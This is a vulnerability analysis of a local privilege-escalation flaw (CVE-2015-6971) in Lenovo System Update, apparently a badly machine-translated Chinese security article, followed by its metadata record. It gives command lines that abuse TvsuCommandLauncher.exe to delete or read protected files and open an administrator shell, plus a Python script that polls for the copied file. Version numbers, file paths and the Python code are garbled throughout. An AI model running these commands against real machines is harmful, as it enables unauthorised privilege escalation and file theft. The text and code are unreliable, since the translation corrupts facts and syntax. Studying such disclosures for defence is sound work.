Description

In the last 7 months, Lenovo a large number of system updates, software vulnerabilities let a person Shine at the moment. Lenovo this spring to fix the first vulnerability, I decided to learn more about these patches to verify the presence of these vulnerabilities. The results I found a related Vulnerability(CVE-2 0 1 5-6 9 7 1), Next I will in detail be described.
Background
Lenovo brand most of the computer contains a is used to update the system software, which is responsible for detecting the computer hardware configuration of the driver and other software to the latest version(including Windows System patch), the user can through the Lenovo System Update to download and install the update.
Vulnerability discovery
The vulnerability was originally developed by Security vendor IOActive found that, due to software design flaws local user permissions can be elevated to SYSTEM. In the detection of the patch version 5. 0 6. 0 0 3 4 When I find it and is not completely repaired.
Lenovo System Update 5.06.0034 comprising a plurality of components. One is running the Local System account of the Windows service through a named channel, the service may receive a user command. Another is to have the signature of the client application, the service will refuse to perform in addition to the signature outside of any application command. The problem for the code injected into the running of the original process resulting in the service end of the bypasssecurity testingto say that some tasteless. Lenovo in 9 month released another patch for the Fix.
Look at the new version 5. 0 7. 0 0 0 8, I discovered a series of new questions: thanks to which there is a legitimate console, no privilege user can also from system to delete arbitrary files.
Working principle
The following code is in Windows 1 0 3 2-bit under test:
6 4-bit machine needs to be%ProgramFiles%replace%ProgramFiles(x86)%, and the detection of 3 2-bit registry location(Wow6432Node).
"%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start
"%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute UACSdk.exe /the arguments "A1 A2 C:\Users\Administrator\Documents\TopSecret.txt A3" /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND
注意 观察 TopSecret.txt the. If this file is for system components function is very important, that we can use this issue to cause denial of service.
Next we will look for a low-rights user is how to through this vulnerability to read arbitrary files. As the internal processing part of Lenovo System Update service to copy any file to the user can read the position, we now specify the above examples(C:\Users\Administrator\Documents\TopSecret.txt)as a demo. Monitoring of this location and read the content very tedious, so I wrote a simple Python script to verify:
import sys
while True:
try:

Adjust the path below on 6 4-bit machine

f = open("C:\\Program Files\the\Lenovo\\System Update\\temp. reg", "r")
print(f. read())
f. close()
break
except IOError as err:
sys. stdout. write(".")
Detect registry as well as the emergence of new value, this also means that an attacker can change the existing state of loading malicious code. For example, by replacing the InProcServer32 the system components location, a long time ago(Windows 3.1-style)on the existence of such a method, however, the Lenovo software and not to its import restrictions.
Finally, since the command processing vulnerabilities, we can through the administrator permission to execute the command.
Welcome to the hands-on go to see, Using a non-privileged user, run the following command:
"%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start
echo test > C:\Users\Public\S.log
"%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute uacsdk.exe /the arguments "A1 A2 C:\Users\Public\S.log "" """ /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND
At this point you should see the Lenovo System Update GUI, then compile the following small program(from%ProgramFiles%\Lenovo\System Update\ 复制 UNCObject.dll)and use a non-privileged user to run
!
This will open a Command Prompt window, the user can perform admin-level access(as the BUILTIN\Administrators group is a member of). Next low privilege user can replace the privileges the user of the work!
Summary
Lenovo software multiple vulnerabilities that allow unauthorized users to get administrator privileges for the enterprise environment, the issue is human life. Lenovo recently released a new version(5.07.0013)to solve this problem.

All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2018

Protected by

{"type": "myhack58", "published": "2015-10-29T00:00:00", "reporter": "\u4f5a\u540d", "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "a280b67eab4d7e0958256cf7709a2353"}, {"key": "href", "hash": "dbc6e6b410b7d96074a46e670075fe70"}, {"key": "modified", "hash": "32c1c04d853ae3f320f13e07b4e587d3"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "32c1c04d853ae3f320f13e07b4e587d3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "645396391020478112635e14b34a0f8b"}, {"key": "title", "hash": "b149238e2a1c55121d85aef2262f9fff"}, {"key": "type", "hash": "0665a8b0792e65b50ab13aef58a018dc"}], "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "hash": "d833f8e75268db9df1bab8428f7c777563d2268cd780185c2ad33e0c58309438", "enchantments": {"score": {"vector": "NONE", "value": 2.1}, "vulnersScore": 2.1}, "edition": 1, "viewCount": 0, "id": "MYHACK58:62201568411", "history": [], "references": [], "lastseen": "2016-11-04T11:39:42", "objectVersion": "1.2", "href": "http://www.myhack58.com/Article/html/3/62/2015/68411.htm", "modified": "2015-10-29T00:00:00", "title": "CVE-2 0 1 5-6 9 7 1: the Lenovo System Update component vulnerability analysis-vulnerability warning-the black bar safety net", "description": "In the last 7 months, Lenovo a large number of system updates, software vulnerabilities let a person Shine at the moment. Lenovo this spring to fix the first vulnerability, I decided to learn more about these patches to verify the presence of these vulnerabilities. The results I found a related Vulnerability(CVE-2 0 1 5-6 9 7 1), Next I will in detail be described. \nBackground \nLenovo brand most of the computer contains a is used to update the system software, which is responsible for detecting the computer hardware configuration of the driver and other software to the latest version(including Windows System patch), the user can through the Lenovo System Update to download and install the update. \nVulnerability discovery \nThe vulnerability was originally developed by Security vendor IOActive found that, due to software design flaws local user permissions can be elevated to SYSTEM. In the detection of the patch version 5. 0 6. 0 0 3 4 When I find it and is not completely repaired. \nLenovo System Update 5.06.0034 comprising a plurality of components. One is running the Local System account of the Windows service through a named channel, the service may receive a user command. Another is to have the signature of the client application, the service will refuse to perform in addition to the signature outside of any application command. The problem for the code injected into the running of the original process resulting in the service end of the bypass[security testing](<http://www.myhack58.com/Article/html/3/Article_003_1.htm>)to say that some tasteless. Lenovo in 9 month released another patch for the Fix. \nLook at the new version 5. 0 7. 0 0 0 8, I discovered a series of new questions: thanks to which there is a legitimate console, no privilege user can also from system to delete arbitrary files. \nWorking principle \nThe following code is in Windows 1 0 3 2-bit under test: \n6 4-bit machine needs to be%ProgramFiles%replace%ProgramFiles(x86)%, and the detection of 3 2-bit registry location(Wow6432Node). \n\"%ProgramFiles%\\Lenovo\\System Update\\ConfigService.exe\" start \n\"%ProgramFiles%\\Lenovo\\System Update\\TvsuCommandLauncher.exe\" /execute UACSdk.exe /the arguments \"A1 A2 C:\\Users\\Administrator\\Documents\\TopSecret.txt A3\" /directory \"%ProgramFiles%\\Lenovo\\System Update\" /type COMMAND \n\u6ce8\u610f \u89c2\u5bdf TopSecret.txt the. If this file is for system components function is very important, that we can use this issue to cause denial of service. \nNext we will look for a low-rights user is how to through this vulnerability to read arbitrary files. As the internal processing part of Lenovo System Update service to copy any file to the user can read the position, we now specify the above examples(C:\\Users\\Administrator\\Documents\\TopSecret.txt)as a demo. Monitoring of this location and read the content very tedious, so I wrote a simple Python script to verify: \nimport sys \nwhile True: \ntry: \n# Adjust the path below on 6 4-bit machine \nf = open(\"C:\\\\\\Program Files\\the\\\\Lenovo\\\\\\System Update\\\\\\temp. reg\", \"r\") \nprint(f. read()) \nf. close() \nbreak \nexcept IOError as err: \nsys. stdout. write(\".\") \nDetect registry as well as the emergence of new value, this also means that an attacker can change the existing state of loading malicious code. For example, by replacing the InProcServer32 the system components location, a long time ago(Windows 3.1-style)on the existence of such a method, however, the Lenovo software and not to its import restrictions. \nFinally, since the command processing vulnerabilities, we can through the administrator permission to execute the command. \nWelcome to the hands-on go to see, Using a non-privileged user, run the following command: \n\"%ProgramFiles%\\Lenovo\\System Update\\ConfigService.exe\" start \necho test &gt; C:\\Users\\Public\\S.log \n\"%ProgramFiles%\\Lenovo\\System Update\\TvsuCommandLauncher.exe\" /execute uacsdk.exe /the arguments \"A1 A2 C:\\Users\\Public\\S.log \"\" \"\"\" /directory \"%ProgramFiles%\\Lenovo\\System Update\" /type COMMAND \nAt this point you should see the Lenovo System Update GUI, then compile the following small program(from%ProgramFiles%\\Lenovo\\System Update\\ \u590d\u5236 UNCObject.dll)and use a non-privileged user to run \n! [](/Article/UploadPic/2015-10/2 0 1 5 1 0 2 9 1 5 9 5 3 5 3 0. png? www. myhack58. com) \nThis will open a Command Prompt window, the user can perform admin-level access(as the BUILTIN\\Administrators group is a member of). Next low privilege user can replace the privileges the user of the work! \nSummary \nLenovo software multiple vulnerabilities that allow unauthorized users to get administrator privileges for the enterprise environment, the issue is human life. Lenovo recently released a new version(5.07.0013)to solve this problem. \n\n"}